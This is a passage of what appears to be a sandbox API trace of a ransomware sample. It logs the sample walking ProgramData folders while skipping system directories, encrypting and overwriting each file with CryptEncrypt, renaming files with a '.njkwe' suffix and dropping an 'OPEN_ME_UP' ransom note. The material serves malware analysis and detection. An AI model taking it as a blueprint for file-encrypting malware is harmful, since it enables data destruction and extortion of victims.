[0068.861] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0068.861] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380e8f0 | out: lpFindFileData=0x380e8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84d6778e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9dfb986, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xf9e9425d, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x5ab2f7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Manifest.xml", cAlternateFileName="")) returned 1 [0068.862] lstrcmpiW (lpString1="Manifest.xml", lpString2="Windows") returned -1 [0068.862] lstrcmpiW (lpString1="Manifest.xml", lpString2="$Recycle.bin") returned 1 [0068.862] lstrcmpiW (lpString1="Manifest.xml", lpString2="System Volume Information") returned -1 [0068.862] lstrcmpiW (lpString1="Manifest.xml", lpString2="Program Files") returned -1 [0068.862] lstrcmpiW (lpString1="Manifest.xml", lpString2="Program Files (x86)") returned -1 [0068.862] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml") returned 159 [0068.862] StrStrIW (lpFirst="Manifest.xml", lpSrch=".njkwe") returned 0x0 [0068.862] lstrcmpW (lpString1="Manifest.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0068.862] lstrcmpW (lpString1="Manifest.xml", lpString2="taridd") returned -1 [0068.862] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0068.862] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0068.862] GetTickCount () returned 0x115199f [0068.862] GetTickCount () returned 0x115199f [0068.862] GetTickCount () returned 0x115199f [0068.862] GetTickCount () returned 0x115199f [0068.862] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380e800*, pdwDataLen=0x380e8b0*=0x2c, dwBufLen=0x80 | out: pbData=0x380e800*, pdwDataLen=0x380e8b0*=0x80) returned 1 [0068.862] GetProcessHeap () returned 0xbe0000 [0068.862] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0068.862] ReadFile (in: hFile=0x444, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380e8b4*=0x2800, lpOverlapped=0x0) returned 1 [0068.863] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.863] WriteFile (in: hFile=0x444, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380e8b4*=0x2800, lpOverlapped=0x0) returned 1 [0068.864] GetProcessHeap () returned 0xbe0000 [0068.864] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0068.864] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.864] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380e8b4*=0x300, lpOverlapped=0x0) returned 1 [0068.865] WriteFile (in: hFile=0x444, lpBuffer=0x380e800*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0x380e800*, lpNumberOfBytesWritten=0x380e8b4*=0x80, lpOverlapped=0x0) returned 1 [0068.865] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380e8b4*=0x4, lpOverlapped=0x0) returned 1 [0068.865] CloseHandle (hObject=0x444) returned 1 [0068.865] GetProcessHeap () returned 0xbe0000 [0068.865] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc4d848 [0068.865] wnsprintfW (in: pszDest=0xc4d848, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml_r00t_{3sXlE5}.njkwe") returned 179 [0068.865] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml_r00t_{3sxle5}.njkwe")) returned 1 [0068.866] GetProcessHeap () returned 0xbe0000 [0068.866] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0068.866] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380e8f0 | out: lpFindFileData=0x380e8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8639b81c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf39b2ab6, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0x3c4670e0, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="UserDeploymentConfiguration.xml", cAlternateFileName="USERDE~1.XML")) returned 1 [0068.866] lstrcmpiW (lpString1="UserDeploymentConfiguration.xml", lpString2="Windows") returned -1 [0068.866] lstrcmpiW (lpString1="UserDeploymentConfiguration.xml", lpString2="$Recycle.bin") returned 1 [0068.866] lstrcmpiW (lpString1="UserDeploymentConfiguration.xml", lpString2="System Volume Information") returned 1 [0068.866] lstrcmpiW (lpString1="UserDeploymentConfiguration.xml", lpString2="Program Files") returned 1 [0068.866] lstrcmpiW (lpString1="UserDeploymentConfiguration.xml", lpString2="Program Files (x86)") returned 1 [0068.866] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml") returned 178 [0068.866] StrStrIW (lpFirst="UserDeploymentConfiguration.xml", lpSrch=".njkwe") returned 0x0 [0068.866] lstrcmpW (lpString1="UserDeploymentConfiguration.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0068.866] lstrcmpW (lpString1="UserDeploymentConfiguration.xml", lpString2="taridd") returned 1 [0068.867] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0068.867] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0068.867] GetTickCount () returned 0x115199f [0068.867] GetTickCount () returned 0x115199f [0068.867] GetTickCount () returned 0x115199f [0068.867] GetTickCount () returned 0x115199f [0068.867] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380e800*, pdwDataLen=0x380e8b0*=0x2c, dwBufLen=0x80 | out: pbData=0x380e800*, pdwDataLen=0x380e8b0*=0x80) returned 1 [0068.867] GetProcessHeap () returned 0xbe0000 [0068.867] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0068.867] ReadFile (in: hFile=0x444, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380e8b4*=0x266, lpOverlapped=0x0) returned 1 [0068.868] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.868] WriteFile (in: hFile=0x444, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x266, lpNumberOfBytesWritten=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380e8b4*=0x266, lpOverlapped=0x0) returned 1 [0068.947] GetProcessHeap () returned 0xbe0000 [0068.947] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0068.948] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.948] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380e8b4*=0x300, lpOverlapped=0x0) returned 1 [0068.948] WriteFile (in: hFile=0x444, lpBuffer=0x380e800*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0x380e800*, lpNumberOfBytesWritten=0x380e8b4*=0x80, lpOverlapped=0x0) returned 1 [0068.948] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380e8b4*=0x4, lpOverlapped=0x0) returned 1 [0068.948] CloseHandle (hObject=0x444) returned 1 [0068.948] GetProcessHeap () returned 0xbe0000 [0068.948] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc4d848 [0068.948] wnsprintfW (in: pszDest=0xc4d848, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml_r00t_{3sXlE5}.njkwe") returned 198 [0068.948] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml_r00t_{3sxle5}.njkwe")) returned 1 [0068.949] GetProcessHeap () returned 0xbe0000 [0068.949] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0068.949] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380e8f0 | out: lpFindFileData=0x380e8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85eb08ee, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf36dde8c, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0x42b5f096, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x38e9a8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="UserManifest.xml", cAlternateFileName="USERMA~1.XML")) returned 1 [0068.949] lstrcmpiW (lpString1="UserManifest.xml", lpString2="Windows") returned -1 [0068.949] lstrcmpiW (lpString1="UserManifest.xml", lpString2="$Recycle.bin") returned 1 [0068.949] lstrcmpiW (lpString1="UserManifest.xml", lpString2="System Volume Information") returned 1 [0068.949] lstrcmpiW (lpString1="UserManifest.xml", lpString2="Program Files") returned 1 [0068.949] lstrcmpiW (lpString1="UserManifest.xml", lpString2="Program Files (x86)") returned 1 [0068.949] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml") returned 163 [0068.949] StrStrIW (lpFirst="UserManifest.xml", lpSrch=".njkwe") returned 0x0 [0068.949] lstrcmpW (lpString1="UserManifest.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0068.949] lstrcmpW (lpString1="UserManifest.xml", lpString2="taridd") returned 1 [0068.949] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0068.949] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0068.950] GetTickCount () returned 0x11519ed [0068.950] GetTickCount () returned 0x11519fd [0068.950] GetTickCount () returned 0x11519fd [0068.950] GetTickCount () returned 0x11519fd [0068.950] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380e800*, pdwDataLen=0x380e8b0*=0x2c, dwBufLen=0x80 | out: pbData=0x380e800*, pdwDataLen=0x380e8b0*=0x80) returned 1 [0068.950] GetProcessHeap () returned 0xbe0000 [0068.950] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0068.951] ReadFile (in: hFile=0x444, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380e8b4*=0x2800, lpOverlapped=0x0) returned 1 [0068.952] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.952] WriteFile (in: hFile=0x444, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380e8b4*=0x2800, lpOverlapped=0x0) returned 1 [0068.952] GetProcessHeap () returned 0xbe0000 [0068.952] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0068.952] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.952] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380e8b4*=0x300, lpOverlapped=0x0) returned 1 [0068.954] WriteFile (in: hFile=0x444, lpBuffer=0x380e800*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0x380e800*, lpNumberOfBytesWritten=0x380e8b4*=0x80, lpOverlapped=0x0) returned 1 [0068.954] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380e8b4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380e8b4*=0x4, lpOverlapped=0x0) returned 1 [0068.954] CloseHandle (hObject=0x444) returned 1 [0069.232] GetProcessHeap () returned 0xbe0000 [0069.232] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc4d848 [0069.232] wnsprintfW (in: pszDest=0xc4d848, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml_r00t_{3sXlE5}.njkwe") returned 183 [0069.232] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml_r00t_{3sxle5}.njkwe")) returned 1 [0069.234] GetProcessHeap () returned 0xbe0000 [0069.234] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0069.234] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380e8f0 | out: lpFindFileData=0x380e8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85eb08ee, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf36dde8c, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0x42b5f096, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x38e9a8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="UserManifest.xml", cAlternateFileName="USERMA~1.XML")) returned 0 [0069.234] FindClose (in: hFindFile=0xc1a0a0 | out: hFindFile=0xc1a0a0) returned 1 [0069.234] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 178 [0069.234] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x440 [0069.236] WriteFile (in: hFile=0x440, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380e8bc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380e8bc*=0x351, lpOverlapped=0x0) returned 1 [0069.237] CloseHandle (hObject=0x440) returned 1 [0069.237] GetProcessHeap () returned 0xbe0000 [0069.237] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0069.237] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380eb78 | out: lpFindFileData=0x380eb78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85953409, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3cb8e906, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3cb8e906, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{1A8308C7-90D1-4200-B16E-646F163A08E8}", cAlternateFileName="{1A830~1")) returned 0 [0069.237] FindClose (in: hFindFile=0xc1a060 | out: hFindFile=0xc1a060) returned 1 [0069.237] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 139 [0069.237] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0069.239] WriteFile (in: hFile=0x43c, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380eb44, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380eb44*=0x351, lpOverlapped=0x0) returned 1 [0069.240] CloseHandle (hObject=0x43c) returned 1 [0069.240] GetProcessHeap () returned 0xbe0000 [0069.240] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0069.240] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85953409, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85953409, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85953409, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{9AC08E99-230B-47E8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 0 [0069.240] FindClose (in: hFindFile=0xc1a2e0 | out: hFindFile=0xc1a2e0) returned 1 [0069.240] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 100 [0069.240] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0069.240] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0069.241] CloseHandle (hObject=0x438) returned 1 [0069.241] GetProcessHeap () returned 0xbe0000 [0069.241] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc36140 | out: hHeap=0xbe0000) returned 1 [0069.241] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85953409, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x85953409, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x85953409, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Packages", cAlternateFileName="")) returned 0 [0069.241] FindClose (in: hFindFile=0xc1a260 | out: hFindFile=0xc1a260) returned 1 [0069.242] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | 